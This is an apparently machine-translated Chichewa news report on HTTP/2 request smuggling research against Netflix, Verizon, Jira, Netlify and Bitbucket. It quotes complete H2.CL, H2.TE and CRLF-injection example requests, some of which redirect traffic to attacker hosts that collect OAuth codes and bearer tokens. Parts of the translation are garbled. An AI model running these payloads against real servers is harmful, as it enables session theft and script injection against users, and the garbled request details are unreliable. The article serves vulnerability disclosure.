Makina apaintaneti omwe kumapeto kwake amavomereza kulumikizana kudzera pa HTTP/2 ndikuwatumizira kumbuyo kudzera pa HTTP/1.1 awonetsedwa ndi mtundu watsopano wa "HTTP Request Smuggling" kuwukira, komwe kumalola, kutumiza zopempha zamakasitomala mwapadera. lowetsani zomwe zafunsidwa kuchokera kwa ogwiritsa ntchito ena zomwe zimasinthidwa mofanana pakati pa frontend ndi backend. Kuwukirako kungagwiritsidwe ntchito kuyika khodi yoyipa ya JavaScript mu gawo lomwe lili ndi tsamba lovomerezeka, zoletsa zoletsa zodutsa ndikuletsa magawo otsimikizira.
Vutoli limakhudza ma proxies a pa intaneti, ma balancers, ma accelerators a intaneti, machitidwe operekera zinthu ndi zina zomwe zopempha zimatumizidwa kutsogolo-kumbuyo-kumbuyo. Wolemba kafukufukuyu adawonetsa kuthekera kowukira machitidwe a Netflix, Verizon, Bitbucket, Netlify CDN ndi Atlassian, ndipo adalandira madola masauzande a 56 pamapulogalamu amalipiro ozindikira zofooka. Vutoli latsimikiziridwanso muzinthu za F5 Networks. Vutoli limakhudza pang'ono mod_proxy mu seva ya Apache http (CVE-2021-33193), kukonza kumayembekezeredwa mu mtundu 2.4.49 (opanga adadziwitsidwa za vutoli koyambirira kwa Meyi ndipo adapatsidwa miyezi 3 kuti akonze). Mu nginx, kuthekera kofotokozera nthawi imodzi mitu ya "Content-Length" ndi "Transfer-Encoding" idatsekedwa pakutulutsidwa komaliza (1.21.1). Zida zowukira zaphatikizidwa kale mu Burp Toolkit ndipo zikupezeka mu mawonekedwe a Turbo Intruder extension.
Mfundo yogwiritsira ntchito njira yatsopano yopangira maukwati pamsewu ndi yofanana ndi chiwopsezo chomwe chinadziwika ndi wofufuza yemweyo zaka ziwiri zapitazo, koma malire akutsogolo omwe amavomereza zopempha pa HTTP/1.1. Tiyeni tikumbukire kuti mu dongosolo la frontend-backend, zopempha zamakasitomala zimalandiridwa ndi node yowonjezera - kutsogolo, komwe kumakhazikitsa kugwirizana kwa TCP kwa nthawi yaitali ndi backend, yomwe imayendetsa zopempha. Kupyolera mu mgwirizano wamba, zopempha kuchokera kwa ogwiritsa ntchito osiyanasiyana nthawi zambiri zimafalitsidwa, zomwe zimatsatira unyolo umodzi pambuyo pa wina, wolekanitsidwa ndi protocol ya HTTP.
Kuwukira kwachikale kwa "HTTP Request Smuggling" kudachokera pa mfundo yakuti kutsogolo ndi kumbuyo kumatanthauzira kugwiritsidwa ntchito kwa mitu ya HTTP "Content-Length" (imatsimikizira kukula kwa deta mu pempho) ndi "Transfer-Encoding: chunked" (imalola deta kuti isamutsidwe m'zigawo) mosiyana. . Mwachitsanzo, ngati kutsogolo kumangogwirizira "Utali Wazinthu" koma nkunyalanyaza "Transfer-Encoding: chunked", wowukirayo angatumize pempho lomwe lili ndi mitu ya "Content-Length" ndi "Transfer-Encoding: chunked", koma kukula kwake ndi "Content-Length" sikufanana ndi kukula kwa chunkeni. Pachifukwa ichi, kutsogolo kudzakonza ndikuwongolera pempholo molingana ndi "Utali-Zambiri", ndipo kumbuyo kumadikirira kumalizidwa kwa chipikacho potengera "Transfer-Encoding: chunked" ndi mchira wotsalira wa pempho la wowukirayo. kukhala koyambirira kwa pempho la munthu wina lomwe liperekedwa pambuyo pake.
Mosiyana ndi protocol ya HTTP/1.1, yomwe imayikidwa pamzere wa mzere, HTTP/2 ndi protocol ya binary ndipo imagwiritsa ntchito midadada yamtundu womwe udatchulidwe kale. Komabe, HTTP/2 imagwiritsa ntchito pseudo-headers zomwe zimagwirizana ndi mitu yanthawi zonse ya HTTP. Pankhani yolumikizana ndi backend kudzera pa HTTP/1.1 protocol, frontend imamasulira mitu yabodza iyi kukhala mitu yofananira ya HTTP HTTP/1.1. Vuto ndiloti backend imapanga zisankho zokhudzana ndi mtsinjewu pogwiritsa ntchito mitu ya HTTP yomwe imayikidwa ndi kutsogolo, popanda kukhala ndi chidziwitso cha magawo a pempho loyambirira.
Makamaka, zikhalidwe za "kutalika kwazinthu" ndi "transfer-encoding" zitha kufalitsidwa ngati pseudo-headers, ngakhale sizigwiritsidwa ntchito mu HTTP/2, popeza kukula kwa data yonse kumatsimikiziridwa. m'munda wosiyana. Komabe, panthawi yosinthira pempho la HTTP/2 kukhala HTTP/1.1, mitu iyi imayendetsedwa ndipo imatha kusokoneza kumbuyo. Pali mitundu iwiri ikuluikulu yowukira: H2.TE ndi H2.CL, pomwe kumbuyo kumasokeretsedwa ndi kusamutsa-encoding molakwika kapena kutalika kwa zinthu zomwe sizikugwirizana ndi kukula kwenikweni kwa bungwe lopempha lomwe lalandilidwa ndi kutsogolo kudzera pa HTTP/2 protocol.
Chitsanzo cha kuwukira kwa H2.CL ndikutchula kukula kolakwika pamutu wabodza wazinthu mukatumiza pempho la HTTP/2 ku Netflix. Pempholi limabweretsa kuwonjezera kwa mutu wa HTTP wofanana ndi Content-Length mukamalowa kumbuyo kudzera pa HTTP/1.1, koma popeza kukula kwa Content-Length kumatchulidwa mocheperapo kwenikweni, gawo la deta yomwe ili mumchira imakonzedwa ngati chiyambi cha pempho lotsatira.
Mwachitsanzo, funsani HTTP/2 :njira POST :njira /n :authority www.netflix.com content-length 4 abcdGET /n HTTP/1.1 Host: 02.rs?x.netflix.com Foo: bar
Zipangitsa kuti pempho litumizidwe ku backend: POST /n HTTP/1.1 Host: www.netflix.com Content-Length: 4 abcdGET /n HTTP/1.1 Host: 02.rs?x.netflix.com Foo: bar
Popeza kuti Content-Length ili ndi mtengo wa 4, backend idzavomereza "abcd" yokha monga gawo la pempho, ndipo "GET /n HTTP/1.1....." yotsalayo idzasinthidwa ngati chiyambi cha pempho lotsatira. ogwirizana ndi wogwiritsa ntchito wina. Chifukwa chake, mtsinjewo udzakhala wosasinthika ndipo poyankha pempho lotsatira, zotsatira za kukonza pempho la dummy zidzaperekedwa. Pankhani ya Netflix, kutchula munthu wina wokhala ndi gulu lachitatu pamutu wa "Host:" mu pempho lachibwana chomwe chinapangitsa kuti kasitomala abweze yankho "Location: https://02.rs?x.netflix.com/n" ndi amalola kuti zinthu zosagwirizana zitumizidwe kwa kasitomala, kuphatikiza Thamangani JavaScript code yanu malinga ndi tsamba la Netflix.
Njira yachiwiri yowukira (H2.TE) imaphatikizapo kulowetsa mutu wa "Transfer-Encoding: chunked". Kugwiritsa ntchito mutu wa pseudo-encoding pseudo-header mu HTTP/2 ndikoletsedwa ndi zomwe zafotokozedwera ndipo zopempha nazo zimaperekedwa kuti zichitidwe ngati zolakwika. Ngakhale zili choncho, zoyambitsa zina zakutsogolo sizimaganizira izi ndikulola kugwiritsa ntchito mutu wa pseudo-encoding mu HTTP/2, womwe umasinthidwa kukhala mutu wofananira wa HTTP. Ngati pali mutu wa "Transfer-Encoding", backend ikhoza kuitenga ngati yofunika kwambiri ndikuyika deta ndi chidutswa mu "chunked" mode pogwiritsa ntchito midadada yamitundu yosiyanasiyana mumtundu "{size}\r\n{block }\r\n{size} \r\n{block}\r\n0", mosasamala kanthu za kugawanika koyamba ndi kukula kwake.
Kukhalapo kwa kusiyana koteroko kunawonetsedwa ndi chitsanzo cha Verizon. Vutoli likukhudza njira yotsimikizira ndi kasamalidwe kazinthu, yomwe imagwiritsidwanso ntchito patsamba monga Huffington Post ndi Engadget. Mwachitsanzo, pempho la kasitomala kudzera pa HTTP/2: :njira POST :njira /identitfy/XUI :authority id.b2b.oath.com transfer-encoded chunked 0 GET /oops HTTP/1.1 Host: psres.net Content-Length: 10 x=
Zinapangitsa kutumiza pempho la HTTP/1.1 kumbuyo: POST /identity/XUI HTTP/1.1 Host: id.b2b.oath.com Content-Length: 66 Transfer-Encoding: chunked 0 GET /oops HTTP/1.1 Host: psres. net Content- Utali: 10x=
M'mbuyomo, adanyalanyaza mutu wa "Content-Length" ndikugawanitsa mkati motengera "Transfer-Encoding: chunked". M'malo mwake, kuukiraku kudapangitsa kuti zitheke kutumiziranso zopempha za ogwiritsa ntchito patsamba lawo, kuphatikiza kulandila zopempha zokhudzana ndi kutsimikizika kwa OAuth, magawo omwe adawonetsedwa pamutu wa Referer, komanso kuyerekezera gawo lotsimikizira ndikuyambitsa makina a wogwiritsa ntchito kutumiza zidziwitso. kwa wolandira wowukirayo. GET /b2blanding/show/oops HTTP/1.1 Host: psres.net Referer: https://id.b2b.oath.com/?β¦&code=secret GET / HTTP/1.1 Host: psres.net Chilolezo: Bearer eyJhcGwiOiJIUzI1Gi1sIkIk6β¦
Kuti muwononge machitidwe a HTTP/2 omwe salola kuti mutu wa pseudo-encoding ufotokozedwe, njira ina yaperekedwa yomwe imaphatikizapo kulowetsa mutu wa "Transfer-Encoding" pouphatikizira kumutu wina wabodza wolekanitsidwa ndi mtundu watsopano ( ikasinthidwa kukhala HTTP/1.1 pankhaniyi imapanga mitu iwiri yosiyana ya HTTP).
Mwachitsanzo, Atlassian Jira ndi Netlify CDN (omwe ankagwiritsa ntchito tsamba loyambira la Mozilla mu Firefox) adakhudzidwa ndi vutoli. Mwachindunji, pempho la HTTP/2 :njira POST :njira / :authority start.mozilla.org foo b\r\n transfer-encoded: chunked 0\r\n \r\n GET / HTTP/1.1\r\n Host : evil-netlify-domain\r\n Content-Length: 5\r\n \r\nx=
zidapangitsa kuti pempho la HTTP/1.1 POST / HTTP/1.1 litumizidwe ku backend\r\n Host: start.mozilla.org\r\n Foo: b\r\n Transfer-Encoding: chunked\r\n Content-Length : 71\ r\n \r\n 0\r\n \r\n GET / HTTP/1.1\r\n Host: evil-netlify-domain\r\n Content-Length: 5\r\n \r \nx=
Njira ina yosinthira mutu wa "Transfer-Encoding" inali kulumikiza ku dzina lamutu wina wabodza kapena pamzere wokhala ndi njira yofunsira. Mwachitsanzo, mukalowa ku Atlassian Jira, dzina lamutu wabodza "foo: bar\r\ntransfer-encoding" lomwe lili ndi mtengo "chunked" linapangitsa kuti mitu ya HTTP "foo: bar" ndi "transfer-encoding: chunked" iwonjezedwe. , ndi kutchula pseudo-header ":njira" mtengo "GET / HTTP/1.1\r\nTransfer-encoding: chunked" anamasuliridwa kukhala "GET / HTTP/1.1\r\ntransfer-encoding: chunked".
Wofufuza yemwe adazindikira vutoli adaperekanso njira yofunsira kuti iwukire kutsogolo, momwe adilesi iliyonse ya IP imakhazikitsa kulumikizana kosiyana ndi backend ndipo magalimoto ochokera kwa ogwiritsa ntchito osiyanasiyana samasakanikirana. Njira yomwe ikufunsidwayo siyilola kusokoneza zopempha kuchokera kwa ogwiritsa ntchito ena, koma imapangitsa kuti pakhale poyizoni posungira zomwe amagawana zomwe zimakhudza kukonza zopempha zina, ndikulola m'malo mwa mitu yamkati ya HTTP yomwe imagwiritsidwa ntchito kusamutsa zidziwitso zautumiki kuchokera kutsogolo kupita kumbuyo ( mwachitsanzo, potsimikizira kumbali yakutsogolo mu Mitu yotere imatha kutumiza zambiri za wogwiritsa ntchito pano ku backend). Monga chitsanzo chogwiritsira ntchito njirayo, pogwiritsa ntchito poyizoni wa cache, zinali zotheka kulamulira masamba mu utumiki wa Bitbucket.
Source: opennet.ru